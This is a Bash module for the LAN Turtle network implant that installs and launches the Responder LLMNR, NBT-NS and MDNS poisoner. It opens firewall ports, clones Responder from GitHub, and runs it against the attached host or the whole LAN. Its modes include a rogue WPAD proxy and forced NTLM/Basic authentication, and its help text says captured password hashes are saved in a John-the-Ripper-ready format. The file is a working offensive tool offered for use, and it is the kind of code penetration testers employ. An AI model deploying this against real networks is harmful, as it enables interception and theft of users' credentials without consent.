411 lines
12 KiB
Bash
411 lines
12 KiB
Bash
#!/bin/bash /usr/lib/turtle/turtle_module
|
|
|
|
# responder by IMcPwn
|
|
# http://imcpwn.com
|
|
|
|
VERSION="2.5"
|
|
DESCRIPTION="Responder - LLMNR, NBT-NS and MDNS poisoner"
|
|
CONF=/tmp/responder.form
|
|
AUTHOR=IMcPwn
|
|
|
|
: ${DIALOG_OK=0}
|
|
: ${DIALOG_CANCEL=1}
|
|
: ${DIALOG_HELP=2}
|
|
: ${DIALOG_EXTRA=3}
|
|
: ${DIALOG_ESC=255}
|
|
|
|
function enable_iptables {
|
|
iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p udp --dport 53 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p udp --dport 137 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p udp --dport 138 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p udp --dport 389 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p udp --dport 5553 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 21 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 25 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 80 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 110 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 139 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 389 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 445 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 1433 -j ACCEPT
|
|
iptables -I INPUT 1 -i eth1 -p tcp --dport 3141 -j ACCEPT
|
|
}
|
|
|
|
function disable_iptables {
|
|
#iptables -t filter -I INPUT 1 -i eth1 -j ACCEPT
|
|
iptables -t filter -D INPUT -i eth1 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p udp --dport 53 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p udp --dport 137 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p udp --dport 138 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p udp --dport 389 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p udp --dport 5553 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 21 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 25 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 80 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 110 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 139 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 389 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 445 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 1433 -j ACCEPT
|
|
iptables -D INPUT -i eth1 -p tcp --dport 3141 -j ACCEPT
|
|
}
|
|
|
|
function start {
|
|
if [ -s /etc/config/responder ];
|
|
then
|
|
responder_interface=$(uci get responder.interface)
|
|
responder_log=$(uci get responder.log)
|
|
responder_mode=$(uci get responder.mode)
|
|
|
|
if [[ $responder_interface == "" ]];
|
|
then
|
|
echo "Responder interface not configured."
|
|
exit 1
|
|
fi
|
|
|
|
if [[ $responder_log == "" ]];
|
|
then
|
|
echo "Responder log location not configured."
|
|
exit 1
|
|
fi
|
|
|
|
if [[ $responder_mode == "" ]];
|
|
then
|
|
echo "Responder mode not configured."
|
|
exit 1
|
|
fi
|
|
|
|
if [[ ! $(opkg list-installed | grep git) ]];
|
|
then
|
|
echo "Dependency git not installed. Installing..."
|
|
check_internet
|
|
opkg update > /dev/null && opkg install git
|
|
fi
|
|
|
|
if [[ ! $(opkg list-installed | grep python-sqlite3) ]];
|
|
then
|
|
echo "Dependency python-sqlite3 not installed. Installing..."
|
|
check_internet
|
|
opkg update > /dev/null && opkg install python-sqlite3
|
|
fi
|
|
|
|
if [[ ! $(opkg list-installed | grep python-openssl) ]];
|
|
then
|
|
echo "Dependency python-openssl not installed. Installing..."
|
|
check_internet
|
|
opkg update > /dev/null && opkg install python-openssl
|
|
fi
|
|
|
|
if [[ ! -d /etc/turtle/Responder || ! -s /etc/turtle/Responder/Responder.py || ! -s /etc/turtle/Responder/Responder.conf ]];
|
|
then
|
|
echo "Required Responder files not found. Downloading..."
|
|
check_internet
|
|
rm -rf /etc/turtle/Responder
|
|
git clone git://github.com/lgandx/Responder /etc/turtle/Responder -q
|
|
fi
|
|
|
|
case $responder_mode in
|
|
1) mode="";;
|
|
2) mode="-A";;
|
|
3) mode="-w";;
|
|
4) mode="-r";;
|
|
5) mode="-F";;
|
|
6) mode="-f";;
|
|
7) mode="-v";;
|
|
8) mode="-r -F";;
|
|
9) mode="-r -F -f";;
|
|
*)
|
|
echo "Responder configuration not valid."
|
|
echo "Please re-configure then try again."
|
|
rm -f /etc/config/responder
|
|
exit 1
|
|
;;
|
|
esac
|
|
|
|
case $responder_log in
|
|
sshfs)
|
|
if pgrep sshfs > /dev/null;
|
|
then
|
|
if [[ $responder_interface == "eth1" ]];
|
|
then
|
|
enable_iptables
|
|
fi
|
|
|
|
if [ -s /etc/turtle/Responder/Responder.db ];
|
|
then
|
|
rm -f /etc/turtle/Responder/Responder.db
|
|
fi
|
|
|
|
if [[ $(readlink /etc/turtle/Responder/logs) != "/sshfs/Responder/logs" || ! -d /sshfs/Responder/logs ]];
|
|
then
|
|
rm -rf /etc/turtle/Responder/logs
|
|
mkdir -p /sshfs/Responder/logs
|
|
ln -s /sshfs/Responder/logs /etc/turtle/Responder/logs
|
|
fi
|
|
|
|
echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface" | at now
|
|
echo -e "Responder started in mode $responder_mode against interface $responder_interface\nand logs are being saved to /sshfs/Responder"
|
|
echo "Logs can be viewed at Configure > log > View log"
|
|
else
|
|
echo "SSHFS not running"
|
|
exit 1
|
|
fi
|
|
;;
|
|
tmp)
|
|
if [[ $responder_interface == "eth1" ]];
|
|
then
|
|
enable_iptables
|
|
fi
|
|
|
|
if [ -s /etc/turtle/Responder/Responder.db ];
|
|
then
|
|
rm -f /etc/turtle/Responder/Responder.db
|
|
fi
|
|
|
|
if [[ $(readlink /etc/turtle/Responder/logs) != "/tmp/Responder/logs" || ! -d /tmp/Responder/logs ]]; then
|
|
rm -rf /etc/turtle/Responder/logs
|
|
mkdir -p /tmp/Responder/logs
|
|
ln -s /tmp/Responder/logs /etc/turtle/Responder/logs
|
|
fi
|
|
|
|
echo "python /etc/turtle/Responder/Responder.py $mode -I $responder_interface &" | at now
|
|
echo -e "Responder started in mode $responder_mode against interface $responder_interface\nand logs are being saved to /tmp/Responder"
|
|
echo "Responder started with pid"
|
|
pgrep -f Responder.py
|
|
;;
|
|
*)
|
|
echo "Responder configuration not valid."
|
|
echo "Please re-configure then try again."
|
|
rm -f /etc/config/responder
|
|
exit 1
|
|
;;
|
|
esac
|
|
else
|
|
echo "Responder not configured."
|
|
exit 1
|
|
fi
|
|
}
|
|
|
|
function stop {
|
|
responder_interface=$(uci get responder.interface)
|
|
if [[ $responder_interface == "eth1" ]];
|
|
then
|
|
disable_iptables
|
|
fi
|
|
if pgrep -f Responder.py > /dev/null; then kill $(pgrep -f Responder.py); fi
|
|
echo "Responder stopped"
|
|
}
|
|
|
|
function status {
|
|
if ps | grep -w -q [/]etc/turtle/Responder/Responder.py; then echo "1"; else echo "0"; fi
|
|
}
|
|
|
|
function check_internet {
|
|
ping -q -w 5 -c 1 8.8.8.8 &> /dev/null && {
|
|
:
|
|
} || {
|
|
echo -e "\nThe LAN Turtle is currently offline. The previous\noperation requires an internet connection."
|
|
exit 1
|
|
}
|
|
}
|
|
|
|
function log {
|
|
dialog --ok-label "Submit" \
|
|
--title "Responder Log Configuration" \
|
|
--extra-button \
|
|
--extra-label "View log" \
|
|
--help-button \
|
|
--radiolist "\n\
|
|
The log files can be saved to SSHFS or tmp.\n" 16 60 3\
|
|
1 "Save log to SSHFS if available." off\
|
|
2 "Save log to /tmp" off\
|
|
2>$CONF
|
|
return=$?
|
|
case $return in
|
|
$DIALOG_OK)
|
|
LOG=$(cat $CONF)
|
|
case $LOG in
|
|
1)
|
|
uci set responder.log="sshfs"
|
|
uci commit responder
|
|
;;
|
|
2)
|
|
uci set responder.log="tmp"
|
|
uci commit responder
|
|
;;
|
|
esac
|
|
configure;;
|
|
$DIALOG_CANCEL)
|
|
configure;;
|
|
$DIALOG_ESC)
|
|
configure;;
|
|
$DIALOG_EXTRA)
|
|
responder_log=$(uci get responder.log)
|
|
case $responder_log in
|
|
sshfs)
|
|
dialog --title "/sshfs/Responder/logs/Responder-Session.log" --clear --tailbox "/sshfs/Responder/logs/Responder-Session.log" 18 72
|
|
;;
|
|
tmp)
|
|
dialog --title "/tmp/Responder/logs/Responder-Session.log" --clear --tailbox "/tmp/Responder/logs/Responder-Session.log" 18 72
|
|
;;
|
|
*)
|
|
echo "Responder log location not configured."
|
|
;;
|
|
esac
|
|
log;;
|
|
$DIALOG_HELP)
|
|
dialog --title "Help" --msgbox "\n\
|
|
All activity will be logged to Responder-Session.log\n\
|
|
Analyze mode will be logged to Analyze-Session.log\n\
|
|
Poisoning will be logged to Poisoners-Session.log\n\n\
|
|
All hashes are dumped an unique file John Jumbo compliant, using this format:\n\
|
|
(MODULE_NAME)-(HASH_TYPE)-(CLIENT_IP).txt\n\n\
|
|
" 18 72
|
|
log
|
|
esac
|
|
}
|
|
|
|
function interface {
|
|
dialog --ok-label "Submit" \
|
|
--title "Responder Interface Configuration" \
|
|
--radiolist "\n\
|
|
Responder can target the Host machine (The computer the LAN Turtle is plugged in to) or the LAN (The network the LAN Turtle is connected to).\n" 16 60 3\
|
|
1 "Target just the Host machine (br-lan)." off\
|
|
2 "Target the entire LAN (eth1)." off\
|
|
2>$CONF
|
|
return=$?
|
|
case $return in
|
|
$DIALOG_OK)
|
|
INTERFACE=$(cat $CONF)
|
|
case $INTERFACE in
|
|
1)
|
|
uci set responder.interface="br-lan"
|
|
uci commit responder
|
|
;;
|
|
2)
|
|
uci set responder.interface="eth1"
|
|
uci commit responder
|
|
;;
|
|
esac
|
|
configure;;
|
|
$DIALOG_CANCEL)
|
|
configure;;
|
|
$DIALOG_ESC)
|
|
configure;;
|
|
esac
|
|
}
|
|
|
|
function mode {
|
|
dialog --ok-label "Submit" \
|
|
--title "Responder Mode" \
|
|
--help-button \
|
|
--radiolist "Choose mode\n \n" 20 60 10\
|
|
1 "Default mode" off\
|
|
2 "Analyze mode" off\
|
|
3 "Start WPAD rouge proxy server" off\
|
|
4 "Enable answers for netbios suffix queries" off\
|
|
5 "Force NTLM/Basic Authentication" off\
|
|
6 "Fingerprint hosts" off\
|
|
7 "Enable verbose" off\
|
|
8 "Options 4 and 5" off\
|
|
9 "Options 4, 5, and 6" off\
|
|
2>$CONF
|
|
return=$?
|
|
case $return in
|
|
$DIALOG_OK)
|
|
mode=$(cat $CONF)
|
|
case $mode in
|
|
1)
|
|
uci set responder.mode="1"
|
|
uci commit responder;;
|
|
2)
|
|
uci set responder.mode="2"
|
|
uci commit responder;;
|
|
3)
|
|
uci set responder.mode="3"
|
|
uci commit responder;;
|
|
4)
|
|
uci set responder.mode="4"
|
|
uci commit responder;;
|
|
5)
|
|
uci set responder.mode="5"
|
|
uci commit responder;;
|
|
6)
|
|
uci set responder.mode="6"
|
|
uci commit responder;;
|
|
7)
|
|
uci set responder.mode="7"
|
|
uci commit responder;;
|
|
8)
|
|
uci set responder.mode="8"
|
|
uci commit responder;;
|
|
9)
|
|
uci set responder.mode="9"
|
|
uci commit responder;;
|
|
esac
|
|
configure;;
|
|
$DIALOG_CANCEL)
|
|
configure;;
|
|
$DIALOG_ESC)
|
|
configure;;
|
|
$DIALOG_HELP)
|
|
dialog --title "Help" --msgbox "\n\
|
|
Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).\n\
|
|
By default, the tool will only answer to File Server Service request, which is for SMB.\n\n\
|
|
The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior.\n\n\
|
|
For more information, see: https://github.com/lgandx/Responder\n\
|
|
" 18 72
|
|
mode
|
|
esac
|
|
}
|
|
|
|
function responderconf {
|
|
dialog \
|
|
--help-button \
|
|
--title "Editing: /etc/turtle/Responder/Responder.conf" \
|
|
--editbox /etc/turtle/Responder/Responder.conf 18 72\
|
|
2>$CONF
|
|
return=$?
|
|
case $return in
|
|
$DIALOG_OK)
|
|
cat $CONF | {
|
|
cat $CONF > /etc/turtle/Responder/Responder.conf
|
|
rm $CONF
|
|
configure
|
|
};;
|
|
$DIALOG_HELP)
|
|
dialog --title "Help" \
|
|
--msgbox "For information on this configuration, see: https://github.com/lgandx/Responder" 20 60
|
|
responderconf;;
|
|
$DIALOG_CANCEL)
|
|
rm $CONF
|
|
configure;;
|
|
$DIALOG_ESC)
|
|
rm $CONF
|
|
configure;;
|
|
esac
|
|
}
|
|
|
|
function configure {
|
|
if [[ ! -s /etc/config/responder ]];
|
|
then
|
|
touch /etc/config/responder
|
|
fi
|
|
|
|
dialog --title "" --menu "" 15 60 5 \
|
|
"log" "Specify log location" \
|
|
"interface" "Specify interface to target" \
|
|
"mode" "Specify Responder mode" \
|
|
"responderconf" "Edit Responder.conf" \
|
|
"back" "Return to previous menu" 2> $CONF
|
|
result=$(cat $CONF && rm $CONF &>/dev/null)
|
|
case $result in
|
|
"log") log;;
|
|
"interface") interface;;
|
|
"mode") mode;;
|
|
"responderconf") responderconf;;
|
|
"back") exit;;
|
|
esac
|
|
}
|